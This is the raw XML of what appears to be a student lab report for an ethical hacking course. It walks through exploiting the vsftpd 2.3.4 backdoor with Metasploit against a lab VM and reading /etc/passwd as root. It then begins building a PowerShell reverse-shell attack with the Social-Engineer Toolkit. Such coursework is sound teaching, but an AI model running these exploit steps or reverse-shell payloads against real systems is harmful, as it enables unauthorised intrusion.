    <w:p w14:paraId="52AA9F65" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="306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Service: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color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.3.4 running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">on port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1C140" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="306" w:right="316"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">This version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> was distributed with a deliberately inserted backdoor. If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user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connects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with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:)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in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username,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it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spawns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shell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on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port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6200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4FB31B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="276"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Command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color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3896DA37" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1645"/>
        </w:tabs>
        <w:ind w:left="1645" w:hanging="196"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(searches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exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>related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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3E4DCB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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3984" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D027795" wp14:editId="02B254E4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>75849</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5696698" cy="1262538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698" cy="1262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3B281C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="141"/>
        <w:ind w:left="306"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>use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exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(selects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module)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E78F7" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1645"/>
        </w:tabs>
        <w:ind w:left="1645" w:hanging="196"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RHOSTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.0.168 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(sets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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>address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vulnerable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machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F35773" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1645"/>
        </w:tabs>
        <w:ind w:right="334" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PAYLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/interact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sets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simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>that allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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exploitation.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necessary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>because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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>does not auto-configure the payload in some cases.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036EA7B4" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1645"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1645" w:hanging="196"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47245E76" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5948A5F0" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5312D68E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="307"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6F666E" wp14:editId="62B934E5">
            <wp:extent cx="5700772" cy="1748885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772" cy="17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DF4C8" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56646569" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6493554B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/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Outputs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>confirming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shell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 xml:space="preserve">root-level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C0A86" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4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5008" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="762F291A" wp14:editId="0A48CA94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>76786</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="747701" cy="342900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701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6C55DA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24265541" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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5520" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25903442" wp14:editId="28318D10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>76100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5207483" cy="5493067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7483" cy="5493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A16CE9" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="8"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DC1FBA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80"/>
        <w:ind w:left="306" w:right="7569"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>aditi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA10CA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4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6032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FFD646D" wp14:editId="07025343">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>76678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1803737" cy="569214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3737" cy="569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22F6A3" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445CC2BA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="306"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:right="697"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create a PowerShell reverse shell social-engineering attack using Social Engineering Toolkit.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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>address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reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>host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Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VM. Open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output file. What are the first 18 characters of the file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A7288C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="3226"/>
      </w:pPr>
      <w:r>
        <w:t>Explain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commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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task. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB4791" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5985752B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9079"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECD73F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="164"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>setoolkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C0A89EA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="502"/>
        </w:tabs>
        <w:spacing w:before="165"/>
        <w:ind w:left="502" w:hanging="196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“Social-Engineering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Attacks”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59C3ED" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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6544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F40E483" wp14:editId="778B781D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>103932</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1798204" cy="1104138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204" cy="1104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BE46EB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="502"/>
        </w:tabs>
        <w:spacing w:before="164"/>
        <w:ind w:left="502" w:hanging="196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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Powershell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Attack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Vectors”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B38DE6" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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7056" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C8BDA8F" wp14:editId="5C4C7AB0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>105386</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1798355" cy="1397508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355" cy="1397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577303" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="502"/>
        </w:tabs>
        <w:spacing w:before="166"/>
        <w:ind w:left="502" w:hanging="196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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Powershell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Reverse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Shell”</w:t>
      </w:r>
    </w:p>
